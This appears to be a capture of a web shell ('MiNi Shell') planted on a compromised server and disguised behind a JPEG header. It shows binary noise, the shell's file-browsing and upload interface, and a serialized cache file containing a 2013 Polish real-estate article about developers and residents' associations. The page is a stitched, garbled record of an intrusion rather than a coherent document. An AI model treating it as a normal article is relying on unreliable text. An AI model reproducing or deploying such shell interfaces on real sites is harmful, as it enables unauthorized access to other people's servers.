JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/cache/dc/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/cache/dc/dcb82344f0cfea7088d093f9719a041a.bin

a:2:{i:0;a:2:{i:0;s:8846:" 
                    
                    <h3 class="title" itemprop="headline">Pozytywne relacje podstawą</h3>
                    <p><span class="glyphicon glyphicon-time" aria-hidden="true"></span> <strong itemprop="datePublished"> 16-12-2013, 00:00</strong>
                        <meta itemprop="dateModified" content=" 16-12-2013, 00:00"/>
                        <div class="hide" itemprop="description">
	Wsp&oacute;łpraca pomiędzy deweloperem a mieszkańcami bywa r&oacute;żna. Jednak coraz częściej inwestorzy wychodzą naprzeciw oczekiwaniom nowych lokator&oacute;w. Dlaczego? Bo obie strony mają wciąż&nbsp;rosnącą świadomość jak ważne są dobre relacje. I drugi pow&oacute;d, zadowolony klient to taki, kt&oacute;ry nie tylko wraca, ale i poleca.</div>
                        <div class="hide" itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
                            <meta itemprop="name" content="nieruchomosci.biz">
                            <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
                                <meta itemprop="url" content="https://www.nieruchomosci.biz/images/loga/nieruchomosci.jpg">
                            </div>
                        </div>
                        <div class="hide" itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
                            <meta itemprop="url" content="https://common.v-manager.pl/">
                        </div>
                        <meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://www.nieruchomosci.biz/artykuly/szczegoly/28142"/>
                        
                                        </p>

                    <div class="lorem">
                        <p>
	<strong>Współpraca pomiędzy deweloperem a mieszkańcami bywa różna. Jednak coraz częściej inwestorzy wychodzą naprzeciw oczekiwaniom nowych lokatorów. Dlaczego? Bo obie strony mają wciąż rosnącą świadomość jak ważne są dobre relacje. I drugi powód, zadowolony klient to taki, który nie tylko wraca, ale i poleca. </strong></p>
<p>
	Rolą dewelopera jest przede wszystkim zrealizowanie inwestycji, czyli zakup gruntów, wybudowanie budynku zgodnego z projektem, zakończenie budowy, a w rezultacie sprzedaż bądź wynajem, np. mieszkań. Bywa jednak tak, że zaraz po sprzedaży lokali deweloper odwraca się plecami do klienta, a sprawy niekiedy kończą się w sądzie. I choć niektóre spory są nieuniknione, to prawo bezsprzecznie staje po stronie lokatorów, którzy mają świadomość, czego mogą wymagać od dewelopera. - Tak naprawdę żaden deweloper nie ma prawa odwrócić się od swoich klientów, bo zobowiązany jest trzyletnią rękojmią lub gwarancją. Zadaniem dewelopera jest przede wszystkim naprawianie usterek - mówi Tomasz Wnuk, dyrektor generalny spółki Łacina Dom.</p>
<p>
	Deweloperzy, aby być bardziej konkurencyjni, muszą coraz szybciej i sprawniej reagować na problemy zgłaszane przez mieszkańców. Te bywają różne, często są to kwestie związane z błędami w wykończeniu lokali, które inwestor pokrywa z własnej kieszeni. Są także sytuacje, podczas których deweloper czynnie współpracuje ze wspólnotą mieszkaniową i np. udostępnia pomieszczenia lub reaguje na bieżące problemy mieszkańców. - Problemów nie da się uniknąć, bo nowe budynki zawsze „pracują” i sprawiają raz mniejsze, a raz większe niespodzianki. Jednak większość spraw związana jest z drobnymi usterkami bądź brakami, na przykład w postaci oświetlenia w przejściu podziemnym. W takiej sytuacji zarządca budynku zgłasza problemy, a my reagujemy – dodaje Wnuk.</p>
<p>
	Wiele zależy także od chęci współpracy nowo powstającej wspólnoty mieszkaniowej. To mieszkańcy mają decydować o głównych kwestiach, jak np. wybór firmy wywożącej śmieci czy zadbanie o zatrudnienie ochrony budynku. Samo pojęcie wspólnoty mieszkaniowej zostało wprowadzone zgodnie z ustawą o własności lokali z 24 czerwca 1994 r., co było związane ze zmieniającym się rynkiem budowlanym w latach 90. Ustawa reguluje stosunki między mieszkańcami a deweloperem. - Wspólnota tworzy się w momencie sprzedaży pierwszego mieszkania i podpisania aktu notarialnego. Jej zadaniem jest dbanie o bieżące sprawy, reagowanie na problemy i współpraca z zarządcą, którego proponuje deweloper. Należy pamiętać że wspólnota w każdej chwili może zmienić zarządcę i w jego miejsce wprowadzić nowego. To mieszkańcy decydują w tej kwestii– podsumowuje dyrektor generalny spółki Łacina Dom.</p>
<p>
	Dobre relacje pomiędzy wspólnotą a deweloperem to korzyści dla obu stron. Lokatorzy mogą liczyć na szybką interwencję i pomoc w problematycznych kwestiach. Z kolei inwestor, który nie zadba o satysfakcjonujące rozwiązanie, może być narażony na negatywne opinie. A te, szczególnie poprzez użycie mediów społecznościowych, są w stanie zrujnować nawet najlepszą ocenę najbardziej prestiżowej firmy. W ciągu kilku godzin, za pomocą takich portali jak Facebook, może powstać potężny ruch krytyki względem problematycznej inwestycji. Ta świadomość sprawia, że deweloperzy są dodatkowo zmotywowani do szybkich reakcji w razie problemów.</p>
<p>
	Wielu deweloperów, starając się zapewnić komfort klientom, uatrakcyjnia ofertę poprzez usługi posprzedażowe. W efekcie oferują wykańczanie mieszkań pod klucz, programy oszczędnościowe czy karty zniżkowe na określone usługi, ale przede wszystkim dbają o to, aby na każdym etapie urządzania własnego „m” lokatorzy mogli liczyć na ich pomoc.</p>                        
                         


                           
                    </div>
                    
                    <div class="text-center">
                                        </div>

                                            
                      
                        
                        
                    
                                        
                                            <div class="nav-table tags mt05">
                            <div>Tagi:</div>    
                            <div>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=współpraca" class="label label-default">współpraca</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=deweloper" class="label label-default">deweloper</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=gwarancja" class="label label-default">gwarancja</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=wspólnota+mieszkaniowa" class="label label-default">wspólnota mieszkaniowa</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=rękojmia" class="label label-default">rękojmia</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=mieszkańcy" class="label label-default">mieszkańcy</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=relacje" class="label label-default">relacje</a>
                                                            </div>
                        </div>
                                            
                        
                    <div id="fb-root"></div>
                    <!--script async defer crossorigin="anonymous" src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0" nonce="2g9iczzS"></script-->
                    
<script>
//<![CDATA[
var lx=!1;window.addEventListener("scroll",function(){(0!=document.documentElement.scrollTop&&!1===lx||0!=document.body.scrollTop&&!1===lx)&&(!function(){var e=document.createElement("script");e.type="text/javascript",e.async=!0,e.src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(e,a)}(),lx=!0)},!0);
//]]>
</script>
                    
                    <div class="social text-center mb1">
                        <div class="fb-like" data-href="https://www.nieruchomosci.biz/artykuly/szczegoly/28142_pozytywne-relacje-podstawa" data-width="" data-layout="button" data-action="like" data-show-faces="false" data-share="true"></div>
                    </div>

                    
                    <div id="articles">    
                        
                    
                                    ";i:1;N;}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:2:{i:0;s:13:"article_28142";i:1;s:8:"articles";}s:4:"data";a:2:{s:32:"451090a89761c7a9c7ddd90e3a267b96";s:21:"0.89526500 1746950382";s:32:"9f4ebfa1b76d6bc6617aec9034853422";s:21:"0.22954000 1749980350";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com